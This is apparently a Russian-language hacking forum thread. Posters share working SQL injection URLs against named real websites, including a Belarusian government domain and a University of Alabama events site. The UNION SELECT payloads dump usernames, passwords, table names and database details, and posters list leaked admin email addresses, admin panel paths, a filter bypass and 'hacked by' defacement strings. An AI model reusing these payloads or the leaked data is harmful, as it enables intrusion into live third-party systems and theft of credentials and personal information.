SQL Инъекции

Code:

http://www.coshuk.com/html/images.php?id=-38 UNION SELECT 1,user(),3,4,5,6,7,8,9,10,11,12,13--

Code:

http://www.yusk.ru/cat.php?id=-10 UNION SELECT 1,2,3,4,user(),6,7--

Code:

http://incognita-terra.ru/cat.php?id=-17 UNION SELECT 1,group_concat(id,0x3a,user,0x3a,pass),3,4,5,6,7,8,9 from userlist--

Code:

http://nobeliat.ru/laureat.php?id=-626 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,GROUP_CONCAT(user,0x3a,pass),17,18,19,20,21,22,23,24 FROM userlist--

 

Code:

http://blogbasket.ru/cat.php?id=-3 UNION SELECT 1,group_concat(table_name),3,4,5,6,7,8 from information_schema.tables where table_schema=database()--

Code:

http://www.2mpz.ru/cat.php?id=-62 union select 1,2,3,group_concat(users_name,0x3a,users_password),5,6,7 from sys_umusers--

 

Сайт со стихами, топ 1 в гугле по запросу "Стихи Пушкина".

ТИЦ: 40
PR: 3

Code:

http://versos.ru/verso.html?id=-1+UNION+SELECT+1,group_concat(id,0x3b,login,0x3b,password,0x3b,salt)29,3,4,5+from+users

 

Code:

http://www.asianewsnet.net/home/news.php?id=27530+limit+0+union+select+1,2,3,4,5,6,7,8,9,(select+concat_ws(0x3a,version(),database(),user())),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+--+

5.0.22
ann_news
ann8002@localhost

 

Code:

http://atlant.by/index.php?r='442&p='21&la='r&item='256

Web Server: Apache/2.2.9 (Debian) mod_ssl/2.2.9 OpenSSL/0.9.8g
тиц: 600

 

.gov домен

Code:

http://infores.mpt.gov.by/ir/database/view_ir.php?id=6279+union+select+1,2,3,version%28%  29,5,6,7,8,9,10,1,12,13,14,15,16,17,18,19,20,21,22  ,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,3  9,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,  56,57,58,59,60,61,62,63,64,65+--+

Спасибо shadowrun

 

Code:

http://infores.mpt.gov.by/ir/database/view_ir.php?id=6279+union+select+1,2,3,version%28%29,5,6,7,8,9,10,1,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65+--+

4.1.25

 

Санкт-Петербург. Бизнес-портал.

Code:

http://www.bpspb.info/vacancy.php?id=[B][COLOR=Red]-[/COLOR][/B]1[B][COLOR=Red]+union+select+1,2,3,group_concat(table_name,0x0a),5,6,7,8,9,10,11+from+information_schema.tables+where+table_schema=0x62707370625f74657374--+[/COLOR][/B]

version: 5.0.92-log
database: bpspb_test
user: [email protected]

hostname: db37.valuehost.ru
dir: /storage/db/mysql/

 

pr6 ; ТИЦ 50

Code:

http://welcomenepal.com/promotional/directory.php?cid=-729658731675+union+select+1,0x6861636b6564206279207375727072697a+--+

[email protected]:5.0.67-log:C252296_ntb

pr5 ; ТИЦ 30

Code:

http://www.elephant.se/location2.php?location_id=-238'+union+select+concat_ws(0x3a,user(),version(),database()),2,3,0x6861636b6564206279207375727072697a,5,6,7,8,9,10+--+

[email protected]:5.0.51a-24+lenny5-log:elephant_se

pr6 ; ТИЦ 40

Code:

http://www.myrepublica.com/portal/printable_news.php?news_id=-31945+union+select+1,0x6861636b6564206279207375727072697a,concat_ws(0x3a,user(),version(),database()),4,5,6,7,8,9,10,11,12,13,14,15,16+--+

myrepub_myrepub@localhost:5.1.61:myrepub_database

 

Code:

http://www.appletonestate.mobi/recipe.php?id=[B][COLOR=Red]-[/COLOR][/B]1[B][COLOR=Red]+union+select+1,2,3,concat_ws(char(32),version(),database(),user()),5,6,7,8,9--+[/COLOR][/B]

version: 5.0.51a-3ubuntu5.4
database: appleton
user: appleton@localhost

Code:

http://mybread.mobi/glossary.php?Id=[B][COLOR=Red]-[/COLOR][/B]1[B][COLOR=Red]+union+select+1,concat_ws%280x3a,version%28%29,database%28%29,user%28%29%29,3--+[/COLOR][/B]

version: 5.1.49-3-log
database: mybreaddatab
user: [email protected]

Code:

http://www.damico.co.za/staff_profile.asp?STAFF_ID=[B][COLOR=Red]-[/COLOR][/B]1[B][COLOR=Red]+union+select+1,concat_ws%280x3a,version%28%29,database%28%29,user%28%29%29,3,4,5--+[/COLOR][/B]

version: 4.1.19-community
database: damicodb
user: [email protected] 3
PR: 3/10

Code:

http://www.associatesanimalhospital.com/Staff_Detail.php?staff_id=[B][COLOR=Red]-[/COLOR][/B]1[B][COLOR=Red]+union+select+1,2,3,4,5,6,7,concat_ws%280x3a,version%28%29,database%28%29,user%28%29%29,9,10,11,12,13,14--+[/COLOR][/B]

version: 5.0.91-log
database: associates
user: [email protected]
RP: 2/10

Code:

www.zhak-s.com.ua/index.php?id=1[B][COLOR=Red]+union+select+1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7,8--+[/COLOR][/B]

version: 5.0.82-log
database: zhak
user: dejavu@localhost
PR: 1/10

Code:

http://www.egc.hu/index.php?menu_id=3[B][COLOR=Red]+and+1=0+union+select+1,2,concat_ws%280x3a,version%28%29,database%28%29,user%28%29%29,4--+[/COLOR][/B]

version: 5.1.49-3
database: egc_public
user: root@localhost

 

Code:

http://www.no-colours-records.de/sites/show_rel.php?id=-1+union+select+1,2,column_name,4,5+from+INFORMATION_SCHEMA.COLUMNS+limit+0,1--

Выводится только одна запись, отчёта об ошибках нет

 

Code:

www.ginnystineinteriors.com/designers_detail.php?staff_id=[B][COLOR=Red]-[/COLOR][/B]1[B][COLOR=Red]+union+select+1,2,3,4,5,6,7,concat_ws(0x3a,version(),database(),user()),9--+[/COLOR][/B]

version: 5.0.91-log
database: fishleg_ginnys
user: [email protected]

Code:

www.wardblakearchitects.com/staff_content.php?staff_id=[B][COLOR=Red]-[/COLOR][/B]1[B][COLOR=Red]+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6--+[/COLOR][/B]

version: 5.0.95-community
database: architectural_wb
user: architectural_us@localhost
PR: 3/10
admin pages: manager, cpanel

Code:

www.jewishchronicle.org/contact/contact.php?staff_id=[B][COLOR=Red]-[/COLOR][/B]1[B][COLOR=Red]+union+select+1,2,3,4,concat_ws(0x3a,version(),database(),user()),6,7,8,9,10,11,12,13,14,15,16,17,18,19--+[/COLOR][/B]

version: 5.0.77-log
database: 577301_jewishchron
user: [email protected]
PR: 4/10

 

вкспорт

Code:

http://www.vksport.ru/catalog_s1.php?id=-1%27+union+select+1,2,3,4,group_concat%280x0b,column_name%29,6+from+information_schema.columns+where+table_name={не смог подобрать}+--+

ТИЦ:10
PR:1

 

ТИЦ = 20
PR = 4

PHP:

http://www.jic.org/index.php?page=9999999'+union+select+1,File_priv,2+from+mysql.user--+

 

pr2

Code:

http://www.instintocigano.com.br/artigos-de-baralho-cigano.php?id=-117+uNion+SELselectECT+1,2,3,0x6861636B6564206279207375727072697A2E,concat_ws(0x3a,user(),version(),%20%20database()),6,7,8,9+--+

обход preg_replace

 

Code:

http://www.nunhems.com.ua/kultury.php?id=-1+union+select+1,2,3,4,5,6,7,8,group_concat%280x0b,table_name%29,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+information_schema.tables+--+

ТИЦ: 30
PR: 4

Все норм выводится, но в админку не зайти, видимо фильтр по ip.

 

PR = 5

PHP:

http://www.bedandbreakfastdc.com/index.php?id=-1+union+select+concat_ws(0x03a,user(),database(),version())--

 

The University of Alabama
тИЦ 275 PR 7 Alexa Rank 25,466
Вывод в теге <title>

Code:

http://events.ua.edu/events/index.php?cat=9999999999+union+select+@@version--

Version - 5.0.27
User [email protected]
Database - ua_calendar

Code:

http://events.ua.edu/events/index.php?cat=9999999999+union+select+group_concat%28Email%29+from+hc_admin--

PHP:

mmuro@ur.ua.edu
rflorenc@as.ua.edu
lmsandy@ur.ua.edu
arainey@ur.ua.edu
etc...

Есть столбец Passwrd

Админка - _http://events.ua.edu/admin/

 

PR - 2

PHP:

http://www.kaizen-co.ru/gallery.php?id=9875465+union+select+1,char(104,97,99,107,101,100,32,98,121,32,100,117,109,98,97),concat_ws(0x3b,user(),version(),database()),4,5--

[email protected];4.0.27-log;kaizen

 

PR - 4

Version: 5.0.92-community
User: cwrowley_clancy@localhost
DB: cwrowley_main


тИЦ - 40, PR - 2

Version: 5.1.56-log
User: forceavt_mila2@localhost
DB: forceavt_force